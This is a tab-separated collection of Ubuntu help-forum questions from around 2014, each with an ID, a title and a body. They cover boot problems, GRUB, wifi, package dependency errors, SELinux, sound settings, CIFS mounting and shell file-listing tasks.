468791	creating a .deb that just places/updates config files ?	i was surprised to not find more people asking this question , but so far i 've only found one from a couple of years ago , with not much in the way of responses . first , some background on what i 'm actually trying to accomplish here : i am working on a custom spin of edubuntu designed for use by educational nonprofits in low/no-bandwidth locations . the server would need to come pre-configured in some specific ways , and i need a reliable way to provide updates to those configurations without having direct access to the systems . thus , a .deb repository that can be put on a usb drive if necessary seems like a reasonable solution . it looks like the packagename.install file wants you to specify every file and dir that you want to include in your package individually . for a package that just places or updates files on a system , this seems like overkill ( and quite tedious if you have a lot of files/dirs ) , as opposed to having something like this your build dir : fs/ |-etc/ |-apache2/ |- conf.d/ |- some_custom_settings.conf |-var/ |-www/ |-html/ |- some_custom_page.html and so on and then having the `` build '' process basically just be rsync -a fs/ / ... but then , that also seems a bit hacky , which makes me wonder if i 'm either missing something or just using the wrong tool for the job . of course , i could just suck it up and use the more tedious packagename.install approach to make .debs , or maybe i should look into something like puppet instead , assuming there 's a way to push updates to disconnected systems in that scenario . or maybe just a git repo ? basically , i 'd welcome any suggestions , whether via .debs or something else . thanks in advance to anyone who can answer !
468792	add 30 seconds to boot in dmsg for no apparent reason	i 'm struggling with this one for some time already with no luck ... mu boot process add 30 seconds around root and swap partitions mount : [ 3.098501 ] switched to clocksource tsc [ 4.692473 ] ext4-fs ( sda7 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 4.911367 ] random : nonblocking pool is initialized [ 31.934982 ] adding 15625212k swap on /dev/sda6 . priority : -1 extents:1 across:15625212k fs [ 32.040254 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 32.083112 ] systemd-udevd [ 356 ] : starting version 204 if i can save this 30 second , my boot would be superfast ! thanks , ivan
468794	grub doesnt detect my windows partiton	i recently mounted the tmpfs in /dev/sda1 where the windows partition was supposed to be at so since then i got a invalid signature when i clicked the windows in grub menu . later i used boot-repair hoping it would solve it what it did was remove the windows from my grub choices . i 've also tried reinstalling grub . i know i 've got to change something with /etc/fstab but im too scared . when i click os-prober i get no result , tried update-grub still nothing . http : //paste.ubuntu.com/7484895/ : is my boot info script ! partition list are here there 's my partitions . please help.. i just do n't want any data to get deleted .
468796	blank disc in dvd-rw drive not reading on k3b burning program but it reads in my dvd-rw drive ?	i want to know how to burn on the k3b burning program when it wo n't indicate there is a blank disc in my dvd- rw drive but it will read in my disc drive but there is no indication that k3b can read it please help ? i have a xubuntu 14.04 version .
468798	how to solve system errors at startup , not just report them	when i start my new ubuntu system running on lenovo thinkpad t540p , i always get two or three popups mentioning some system problem and giving me the opportunity to report them . aside from waiting for some good soul at ubuntu to tell me what is going on , which i do not expect to happen , what can i do to see exactly what the system is complaining about , so that i might possibly have a shot at correcting it myself . is it possible for example , for me to see the reports the system is filing on my behalf ? or is there a log that will point me to the problem ? other than the fact that these things pop up , i see nothing wrong with the system .
468799	where is `gapplication` ?	i have installed gnome 3.12 on ubuntu 14.04 using the gnome-team/staging ppa . launching gnome-document using the application launcher ( .desktop ) works fine , but if i type gnome-document in a terminal , it complains about gapplication not being found . indeed , after some googling , i found that gapplication is here to launch apps using dbus . it seems also to be part of glib . what package ( if any ) provides /usr/bin/gapplication ? is it possible to install it ( possibly from source ) on ubuntu 14.04 ? it would also be nice to learn more about this new way to launch apps .
468800	slow wi-fi problem..tried every way i could	i am sorry to bother with this boring issue , but i am starting to be quite desperate . it 's common issue , wi-fi is slow as hell after ubuntu upgrade ( saucy salamander ) , and i do n't know how to fix it . my 2 friends pc had the same issue , i heroically managed to fix it with some advice found on the internet , but nothing seems to work on my computer - hp 6720s , tried another router , no improve . i tried everything from here : http : //itsfoss.com/speed-up-slow-wifi-connection-ubuntu/ , all the iwlwifi stuff , power off manager , disable ipv6 , install wicd , with no success . i thought update driver should help . i got stucked here http : //wireless.kernel.org/en/users/drivers/iwlwifi/ ? p=iwlwifi & n=downloads with no idea what and how to obtain the right one . i am quite a lame in linux , i work like monkey see , monkey do , so maybe i missed some easy solution . any suggestions from wise linux people is warmly welcomed . oh , and this is what i got from sudo lshw -c network *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:10:00.0 logical name : wlan0 version : 02 serial : 00:1b:77 : c0:4e:8f width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.11.0-20-generic firmware=15.32.2.9 ip=192.168.0.20 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:46 memory : e4000000-e4000fff
468801	wifi works only after i suspend my ubuntu 14.04 and wake up the system from suspend [ solved ]	once i start my system , wifi wont work , enable wifi is disabled . only after i suspend my ubuntu and login again it works perfectly fine .
468803	buy a ubuntu support	i would like to buy a full support for my personal ubuntu dektop , but ubuntu advantage standard desktop ( 5-pack ) is for me too expensive . is there other way ?
468805	screen , graphics card and input seeting problem	i am new to linux . today i installed ubuntu 14.04 lts on my laptop , which is acer aspire e1 572g . after installing i am getting this pop-up every single time when i start my laptop . `` `` your screen , graphics card and input device settings could not be detected correctly.you will need to configure these yourself '' and then it takes me into command terminal . i absolutely do not have any idea what to do now and i removed windows in process of installing ubuntu .
468808	how to install bitcoin mining software in ubuntu 14.04 for joining a mining pool ?	i just installed bitcoin-qt wallet on ubuntu 14.04 and have synced with the bitcoin network . how do i install a mining program that will enable me to join a mining pool ?
468809	multitouch gesture in ubuntu 14.04	i got new t440s first thing i did was ubuntu installation . to be honest i 'm mac 's user , i have macbook air , that 's why i 'm used to some gestures on my touchpad . i was so disappointed when i realized that only 2-finger scroll is working . my expectations are very low - 3/2 -finger back/forward in browser is enough . i 've tried several solutions : mtrack driver - does n't work well only half of touchpad is working touchegg - when i started it nothing was happened . it seems that it does n't like unity and non of the gestures was captured . easystroke - does n't support multitouch has anyone made back/forward gesture work in 14.04 lts ?
468811	remove vlc player from sound menu in unity bar	i donât use vlc that much to have it there , so i would like to remove it from the sound menu in the top right . i found a small image to show what it looks like ( the sound menu is open and shows vlc along with other music players ) . sorry for giving a very low resolution image .
468821	selinux is not enabled	i installed selinux on ubuntu using the command : sudo apt-get install selinux config file in /etc/selinux contain following information selinux=permissive selinuxtype=default setlocaldefs=0 but i am not able to set selinux , when i check using sestatus -v command it gives output selinux is disabled how should i enable my selinux ? when i use command seinfo . it gives following output error : policydb version 26 does not match my version range 15-24 error : unable to open policy /etc/selinux/default/policy/policy.26 . error : input/output error check-selinux-installation command gives following output ../proc/1 kernel.. selinux is not enabled . the init process ( pid 1 ) is running in an incorrect domain . /etc/pam.d/login is not selinux enabled fsckfix is not enabled - not serious , but could prevent system from booting ... udev will create nodes not labeled correctly please help
468822	how can i limit the sound output db ?	i know i can limit the audio volume in many ways , trough pulseaudio or alsa , or with some media players settings . what i 'm looking for is different . this is the scenario : i use to watch movies late at night , and in order to follow the conversations i have to set the volume level so they 're clear but not annoying to other people ( neighbours ) . the problem is when the movie have some scenes where the sound is louder ( let 's say , action or explosions , etc ) . if i lower the volume to avoid these , i usually ca n't listen to the normal dialogues later . and it 's really annoying having to modify the volume constantly . so i would like to know if there 's some way i can put a limit cap not to the output volume , but to the real volume of the audio sent to the speakers . i would prefer some system-wide solution , but could work also with some vlc or smplayer settings , which are the programs i use for movies .
468825	mute button wo n't toggle / un-mute	on my old dell latitude d620 i 'm running lubuntu . the mute button wo n't toggle / un-mute . i press it and it mutes fine . but when i press it again it wo n't un-mute . i have to use the mouse an go to the volume control setting and un-check the mute box . any suggestion on how to fix this nuisance ? -thanks !
468826	how to run rainmeter trough wine ?	i tried to run rainmeter through wine and everytime i opened it , it crashes and gives me a program error : `` the program rainmeter.exe has encountered a serious problem and needs to close '' .
468831	ubuntu 14.04 dash default file options change ?	before upgrading to 14.04 when i was clicking on a file in dash , it was opening the file . this behaviour is still present on my 12.04 . in 14.04 when i click on a file in dash search results , it offers me 3 options : 'email ' , 'open ' and 'show in folder ' . how can i get back the previous behaviour , i.e . to immediately open the files on the click ?
468833	i want to customize live ubuntu . i want to edit initrd.lz so that live user is guest	i want to customize live ubuntu . initrd.lz create live user `` ubuntu '' with blank password as boot-on-fly . i want to edit initrd.lz so that live user it creates have same restriction as guest session . in other way i want to enable guest session on live ubuntu and disable or password protect the highprivilege live user . i know the change i need to make if i have to only disable live user . but guest user . i have no idea.. can someone help with ...
468834	ubuntu wo n't boot ; ubuntu recovery works ; windows works	i was practicing javascript within codecademy.com 's in-browser program , and accidentally submitted an infinite for loop . it ran the code , the browser locked up , and without much of an option , i rebooted . upon reboot , after the selection screen ( between ubuntu , ubuntu recover , windows ) when i select ubuntu , it tries to load but does n't get past a black screen . i 've had no problems with it for the past month i 've had it . it loads ubuntu recovery fine , and windows fine . i am using the windows system now . how can i fix this ? i am not well versed enough to know how to edit the startup code ( else i would n't be in this mess ) . btw : i 'm using dell inspiron n7110
468835	typing problem on terminal	i was writing a java program typing `` vi filename.java '' . but there was so many problem in typing . backspace is n't working , and many keys is n't working properly . but it 's not in terminal window it 's occurs on the window arrived after typing `` vi filenaame.java ''
468841	lxde input incredily laggy	as of this morning my lxde keyboard input is unbelievably laggy . i have to very carefully type one character at the time and it can take several seconds for the glyph to appear onscreen . sometimes i get repeats and sometimes they repeat endlessly . everything else appears normal . the system is under no strain at all , has 8gb of ram and the problem occurs with all applications tried so far ( chrome , thunderbird , libreoffice writer , lxterminal ... ) even when loaded one at the time . the problem persists across boots ( indeed is worst right after login ) . the login manager ( password entry screen ) does not seem to suffer from the same problem . i made no modification to my system prior to the problem arising yesterday but this morning i executed an apt-get update & & apt-get upgrade cycle to see if that might rectify matters . yesterday i had been testing hibernation ( to no avail ) when the problem first arose , leading me to believe that the issue was related to vm and swap , but i am increasingly convinced the matter is largely coincidental ( maybe i do indeed lack a swap partition , but it should hardly be an issue on a fast , modern machine with oodles of ram after a fresh reboot ) . somebody mentioned stray nfs as a possible source of resource depletion but i am sceptical as i do not have any nfs exports enabled as far as i am aware . disconnecting the machine from wifi did not lessen the problem , so in practical terms i doubt it is a network-related issue . as far as i can see i have no runaway processes burning resources , but here is the current output of my top list just in somebody can spot something i am missing . tasks : 195 total , 3 running , 192 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 0.4 us , 0.3 sy , 0.0 ni , 99.3 id , 0.0 wa , 0.0 hi , 0.0 si , 0.0 st kib mem : 7689472 total , 1415268 used , 6274204 free , 48268 buffers kib swap : 0 total , 0 used , 0 free . 621716 cached mem pid user pr ni virt res shr s % cpu % mem time+ command 2265 user 20 0 856168 17980 11016 s 0.7 0.2 0:00.78 lxterminal 1402 root 20 0 279148 46736 38736 s 0.3 0.6 0:11.10 xorg 2584 user 20 0 29192 1740 1220 r 0.3 0.0 0:02.49 top 1 root 20 0 34176 3492 1484 s 0.0 0.0 0:03.75 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ksoftirqd/0 5 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/0:0h 7 root 20 0 0 0 0 r 0.0 0.0 0:00.37 rcu_sched 8 root 20 0 0 0 0 s 0.0 0.0 0:00.12 rcuos/0 9 root 20 0 0 0 0 s 0.0 0.0 0:00.12 rcuos/1 10 root 20 0 0 0 0 s 0.0 0.0 0:00.15 rcuos/2 11 root 20 0 0 0 0 s 0.0 0.0 0:00.12 rcuos/3 12 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuos/4 13 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuos/5 14 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuos/6 15 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuos/7 16 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcu_bh 17 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/0 18 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/1 19 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/2 20 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/3 21 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/4 22 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/5 23 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/6 24 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/7 25 root rt 0 0 0 0 s 0.0 0.0 0:00.62 migration/0 28 root rt 0 0 0 0 s 0.0 0.0 0:01.14 migration/1 29 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ksoftirqd/1 30 root 20 0 0 0 0 s 0.0 0.0 0:00.56 kworker/1:0 31 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/1:0h 33 root rt 0 0 0 0 s 0.0 0.0 0:01.39 migration/2 34 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ksoftirqd/2 36 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/2:0h 38 root rt 0 0 0 0 s 0.0 0.0 0:00.09 migration/3 39 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ksoftirqd/3 41 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/3:0h 42 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 khelper 43 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kdevtmpfs 44 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 netns 45 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 writeback 46 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kintegrityd 47 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 bioset 48 root 0 -20 0 0 0 s 0.0 0.0 0:00.01 kworker/u17:0 49 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kblockd 50 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 ata_sff 51 root 20 0 0 0 0 s 0.0 0.0 0:00.00 khubd 52 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 md 53 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 devfreq_wq 55 root 20 0 0 0 0 s 0.0 0.0 0:00.78 kworker/0:1 61 root 20 0 0 0 0 s 0.0 0.0 0:00.00 khungtaskd 62 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kswapd0 63 root 25 5 0 0 0 s 0.0 0.0 0:00.00 ksmd at present the system is totally unusable and since i need to get it back into working order in time for a business trip on thursday if i do not find a solution to this ( likely trivial ) issue i shall be , sadly , forced to totally reinstall in order to circumvent the issue . that of course would be a crying shame but being a total novice i lack the means to identify the problem .
468845	how to list directory contents recursively ?	i need help with a script that displays the subdirectory structure of the current directory , along with the names of files in these subdirectories . i 've tried commands tree , ls , and grep but it is hard to find the exact command ( s ) i need .
468846	permanent grub edit from ro to rw	i recently installed the latest version of ubuntu onto my laptop and having a slight issue during boot-up . during boot up i get the following error : `` serious errors were found while checking the disk drive for / '' . after doing some research on here , i have been able to fix the problem and get ubuntu to boot just fine after i go into grub boot entry and ro to rw . for example ; ro- linux /boot/vmlinuz-3.13.0-24-generic root=uuid=aac884ac1f144321 loop=/ubuntu/disks/root.disk ro quiet splash $ vt_handoff rw- linux /boot/vmlinuz-3.13.0-24-generic root=uuid=aac884ac1f144321 loop=/ubuntu/disks/root.disk rw quiet splash $ vt_handoff how can i permanently edit this so that i no longer after edit this every time i boot-up . i greatly appreciate any help . i am a total noob with this os !
468852	i have problem updating my software ?	i have problem updating my software , after running my update manager this is what it says in the last line . `` some index files failed to download . they have been ignored , or old ones used instead . ''
468854	ubuntu 14.04 - menu bar , side bar missing	i am running a ubuntu 14.04 machine . i upgraded virtualbox to 4.3 by first deleting the old one ( as here ) , then installed 4.3 . while installing the ubuntu software center 's progress icon kept spinning even after the progress bar had completed . i tried to start virtualbox by searching its name from the top left menu ( i do n't what that menu is called ) . after that the ubuntu software center finished installation for virtualbox 4.3 . a weird thing happened at this point ; the icon for the ubuntu software center changed to a question mark . at this point it did n't seem like a problem . i tried a reboot of my system , and now there is no menu bar and no side bar ( which appears to the left ) . can anyone help me out ? what did i mess up ? edit : i provided the link i used to solve this problem . at first the desktop came back to normal , but virtualbox was no longer installed . so i tried installing virtualbox-4.3.12 again , this time waiting patiently for it to finish . the problem occured again . is virtualbox-4.3.12 not ready for ubuntu-14.04 ? the unity package somehow gets uninstalled automatically . i have to reinstall it again and apply the solution in the answer . also the ubuntu software center gets uninstalled .
468856	gaming on linux ( ubuntu )	i had ubuntu 13.10 and it took a lot of time to get used to it and investigate how to install games on it . i had playonlinux running with wine , winetricks , and it worked fine . after the upgrade to 14.04 finished , every game every program that i installed using playonlinux went to hell and i ca n't use them ! i ca n't even reinstall the games because it displays errors that never showed up before on playonlinux ( like something to do with wineprefix that does not work ) . how can i get playonlinux , wine , and winetricks all working again ?
468858	ca n't login after killing x server with encrypted home directory	i have ctrl-alt-backspace enabled to terminate xorg in an xorg.conf.d file : section `` inputclass '' identifier `` keyboard defaults '' matchiskeyboard `` yes '' option `` xkboptions '' `` caps : super , terminate : ctrl_alt_bksp '' endsection this successfully kills the server and brings me back to the lightdm login screen . but after doing this i ca n't login anymore . after entering my credentials lightdm goes black for a second and then brings me back to the login screen . i think the problem might be related to my encrypted home directory . after a reboot , if i login via a virtal console ( ctrl-alt-f1 ) my home directory gets properly decrypted and mounted . if i stay logged in via the virtual console i can kill the x server and still login again in lightdm , presumably because my home directory did n't get unmounted ( as i still had an active session open ) . but if i logout of the virtual console , killing the x server results in me not being able to login via lightdm and if i login using the virtual console my home directory does n't get automatically unencrypted/mounted . according to the readme that i see when my $ home is n't mounted , i should be able to run ecryptfs-mount-private , but when i run that it exits immediately with an exit code of 0 and no error messages and it does n't mount my home directory . this is happening on xubuntu 13.10 . i have n't found anything useful in any logs . any tips on fixing this or diagnosing the problem would be appreciated .
468859	update manager gives unmet dependency error	can anyone please help me to solve the issue ? while updating update manager gives the following error : the following packages have unmet dependencies : **libqt4-declarative : ** depends : libqt4-network ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqt4-script ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqt4-sql ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.1-0ubuntu4.8 is installed **libqt4-declarative : i386 : ** depends : libqt4-network ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqt4-script ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqt4-sql ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.8 is installed ****libqt4-opengl : **** depends : libgl1 but it is a virtual package depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.8 is installed **libqt4-svg : ** depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.8 is installed **libqtgui4 : i386 : ** depends : libqt4-declarative ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.1-0ubuntu4.8 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.8 ) but 4:4.8.1-0ubuntu4.8 is installed
468860	xubuntu 14.04 install fails on dell inspiron b130 with broadcom 4318	i have a dell inspiron b130 i am trying to install 32-bit xubuntu 14.04 on . the install of 13.10 was aok but the update failed catastrophically , so i am reinstalling from scratch . wifi and the ethernet port work aok in windows 8.1u1 ( 70 secs to boot ) and mint 16 cinnamon ( 135 secs to boot ) , but neither work in 14.04 and the install fails on the dell ; it wo n't find the network ( which also fails on bodhi 32-bit ) . since any install fails whether or not i have an internet connection ( with `` an attempt to configure apt to install additional packages from the cd failed '' ) whether or not i select to update apps in the install , whether or not i choose to install mp3 and other multiverse items , i am unable to install then go get drivers .
468862	share a folder between windows 8.1 guest and ubuntu 14.04 host in virtualbox	i have a computer running ubuntu 14.04 , with windows 8.1 running inside virtualbox . i needed windows for a number of reasons , mainly for office and onedrive ( school things ) . my problem is that i ca n't seem to create a shared folder between the two computers . i have a folder /home/graham/windows , that i have set as a shared folder for the guest in virtualbox . edit : in regards to other documentation , most is for windows has a host and ubuntu as a guest , or an older version of windows as a guest . everything i find says the shared folder should just appear within windows 8.1 , but this is not the case . when trying to mount \\vboxsvr\windows within windows 8.1 , it says that the server ca n't be accessed . i have virtualbox guest addons installed on the guest . here is a screenshot of the error given by windows when trying to map the network drive : any suggestions are greatly appreciated ! graham
468863	'sh : 1 : /usr/bin/xauth : input/output error ' error when trying to connect to school 's server	i 'm trying to connect school 's server but it gives following error at opening : sh : 1 : /usr/bin/xauth : input/output error it does still connect to the server and i can change directories , but i ca n't open any program such as nano . that gives the following error : -bash : /usr/bin/gnome-open : input/output error can anyone help with this error ?
468865	logitech headset 350 working half of the time	sometimes my logitech headset works fine for about half an hour , after that it ll just put my sound level to 0 and the device wo n't show up again in the sound settings . ( most of the time i retry to plug it in and after a while it works for half an hour ) . i ran the next command when i plugged the device in . ~ $ dmesg |tail [ 20765.468781 ] usb 2-1.3 : device not accepting address 34 , error -32 [ 20765.876935 ] usb 2-1.3 : new full-speed usb device number 36 using ehci-pci [ 20765.975005 ] usb 2-1.3 : new usb device found , idvendor=046d , idproduct=0a02 [ 20765.975014 ] usb 2-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 20765.975019 ] usb 2-1.3 : product : logitech usb headset [ 20765.975024 ] usb 2-1.3 : manufacturer : logitech [ 20765.989114 ] usb_audio : warning ! unlikely big volume range ( =464 ) , cval- > res is probably wrong . [ 20765.989121 ] usb_audio : [ 6 ] fu [ mic playback volume ] ch = 1 , val = -10496/-3072 /16 < 6 > [ 20766.008235 ] input : logitech logitech usb headset as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.3/input/input30 [ 20766.008493 ] hid-generic 0003:046d:0a02.0010 : input , hidraw0 : usb hid v1.00 device [ logitech logitech usb headset ] on usb-0000:00:1d.0-1.3/input3 [ 20767.847989 ] retire_capture_urb : 193 callbacks suppressed i noticed the warning , so i guess that could have something to do with it . is it possible that my device is broken ? what i did so far : - got the newest version of pulseaudio - added ppa : ubuntu-audio-dev/ppa
468868	kubuntu 13.10 install on a dell xps420 hangs	i am trying to install kubuntu 13.10 on an old dell xps420 . the iso i downloaded works fine on a number of other pc 's ( hp desktop , dell laptop ) so i feel confident that the iso is ok , but when i try it on the 420 the small kubuntu symbol ( stick figure and gear ) comes up and then the machine hangs . this 420 has a 'dell miniview ' and i wonder if this additional 'feature ' is causing the hang . thanks for any help
468870	append text to file names which do not contain a dot	given the following files : english_api english_overview style.css i want to get : english_api.html english_overview.html style.css in other words how to append a text to all files that do not contain a dot ( . ) within a directory using terminal . obviously there is a lot of files in that folder ; i just wrote 3 as an example . if i were to , lets say , replace .css with .html in that folder , i would use : rename .css .html *.css but i can not really think of a way to match files that do not contain something . also how to append ( vs replace ) using rename command ?
468875	plugins : `` ugly '' and `` bad ''	why are gstreamer plugins labeled as `` bad '' and `` ugly '' ?
468881	failed firmware for linux kernel update	i 'm a bit new to this , while updating the firmware for linux kernel drivers ( 1.79.14 ) i encountered the following problem : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 193788 files and directories currently installed . ) preparing to replace linux-firmware 1.79.1 ( using ... /linux-firmware_1.79.14_all.deb ) ... unpacking replacement linux-firmware ... dpkg : error processing /var/cache/apt/archives/linux-firmware_1.79.14_all.deb ( -- unpack ) : trying to overwrite '/lib/firmware/ar3k/athrbt_0x31010000.dfu ' , which is also in package bt-dw1705-firmware 0.1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-firmware_1.79.14_all.deb error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've already tried solution that was posted for this question but the same problem still exists . ( ubuntu 12.04 )
468883	weird font style on chromium	i just installed ubuntu 13.10 and chromium , but the font looks quite weird . how can i fix this ? here is the settings :
468885	my resolution doesnt change , the only resolution i have is 1920 x 1080	please help i have been looking everywhere for this and no one talks about it , what do i download or type ? also if you can point me to a launcher application that would be helpful im not sure what im doing
468887	ubuntu 14.04 lts freezing frequently	i 'm brand new to linux and am having a very hard time troubleshooting this problem . every so often my screen will freeze and i ca n't do anything but move the mouse around . i can see the mouse cursor moving around , but i ca n't click on anything . the keyboard seems to work for 1 shortcut i found `` alt + print screen + r e i s u b `` . it happens every time when i try to open the amazon app on my sidebar . it also seems to happen randomly other times like when using the reddit app occasionally . i literally just installed ubuntu within the last 2 hours or so . i5 2500k gskills ripjaw 1600mhz 2 x 4gbs evga gtx 570 superclocked asus p8p67 pro motherboard razer lachesis mouse logitech k350 wireless keyboard 1 samsung 840 pro 120gb ssd with windows 7 64bit 1st wd caviar black 1tb for windows files 2nd wd caviar black 1tb : -500mb boot partition set as primary , ext4 -200gb root partition set as primary , ext4 -10gb swap set as primary i set location for the new partition to `` beginning '' for all 3 partitions . the rest of the 1tb drive holding ubuntu has nothing on it and is just `` free space '' . i 've got 2 monitors hooked up to my gpu ; asus 23.6 '' 1080p monitor by dvi and 40 '' sony television by hdmi
468894	install php5.3 on ubuntu 14.4	how can i install php5.3 on my ubuntu 14.04 server ? apt-cache showpkg php5 shows no 5.3 versions . i tried to install them using the example from this post ( using 3.13 for my ubuntu version ) but apt-get says the version does n't exist . how to downgrade from php 5.4 to 5.3 also tried downloading 5.3 from php.net and compiling but received compile errors . any other ideas ?
468896	how to append just hidden files names in a directory to a file ?	i need to save just hidden files names in a directory and subdirectories to a file . what is the command that do this job ?
468898	ca n't find user music in san andreas	i have been using xubuntu for a while now on a dual boot with windows . slowly migrating over as more games become available on linux . i have gta : san andreas on both steam and dvd . the play on linux steam install is bugged . i finally popped in the dvd and used just the plain wine 1.6.2 instead of pol to install it and now it runs beautifully , much smoother than on windows . now san andreas is no fun with out my own music , so i started to copy music to the wine directory where san andreas is installed . however no matter what i do i can get my music to come up in game . i 've tried using windows shortcuts to the mp3s ( both native windows and wine windows shorcuts ) , i 've tried linux shortcuts , i even dropped the mp3s straight into the user tracks folder . another thing is that it will not save . it will act like it is saving , no errors , but the save game list is always empty , and no save files are created . o_o is there some write/read permissions i need to set to fix both ? after trial and error ( linux steam , pol steam , wine steam ) , i got black mesa working on pol steam , and i have skyrim fully modded on my windows side , and i 'm a web coder , so i know computers , but i am still a rather new to linux . any help would be appreciated . edit : so i am now on the latest stable wine . i reinstalled san andreas wising plain wine and my disk , no pol , no steam . now it will save the game properly but i still can not get my music in-game . i have put the mp3s straight into the user tracks folder that is right next to the save game , and that is the folder in which music goes on windows , i know it 's in the right place . i have the automatic music scan on , and i have manually scanned for user tracks . still no joy . i feel like the guy that just rebuilt his car and engine from scratch but ca n't get his radio to work ... .lol update : i downloaded the crossover trial and installed the steam san andreas used the crossties installer.. it runs better , but i still can not get my user music into the game . any help would be appreciated .
468899	maya calendar from elementary os on ubuntu	the maya calendar from elementary os seems really nice : has anyone been able to run it on ubuntu ? is it available on some repository ? after installing the dependencies , i only get a ton of error messages when i try to build it from source . this question on the official page has no positive answer yet .
468901	how to show only hidden files in terminal ?	i have a directory that contains thousands of files , some of them are hidden . the command ls -a list all files , including hidden ones , but i need just to list hidden files . what command should i use ?
468914	ubuntu 14.04 : how do you use mount.cifs , mount.nfs , they are not in the repositories any more ?	in ubuntu 12 lts , i always used mount.cifs and mount.nfs now they are not in the ubuntu 14.04 repository , so how do you use mount cifs and mount nfs or install them in 14 ? thanks i.e . ) ubuntu 12.04 always worked with : root @ ub12box # mount -t cifs -o user=administrator '\\192.168.0.1\data ' /tmp/myserver ; df ; password : *************** filesystem 1k-blocks used available use % mounted on /dev/sdb2 144636 85800 26058836 8 % / \\192.168.0.1\data 8059772 652288 407484 6 % /tmp/myserver but doesnt work in ubuntu 14.04 machine same command : root @ ub14box # mount -t cifs -o user=administrator '\\192.168.0.1\data ' /tmp/myserver ; df ; mount : block device \\192.168.0.1\data is write-protected , mounting read-only mount : can not mount block device \\192.168.0.1\data read-only filesystem 1k-blocks used available use % mounted on /dev/sdb2 126636 950900 99958936 2 % / root @ ub14box # dmesg|tail [ 2023.664186 ] status code returned 0xc000006d nt_status_logon_failure [ 2023.664197 ] cifs vfs : send error in sesssetup = -13 [ 2023.667124 ] cifs vfs : cifs_mount failed w/return code = -13 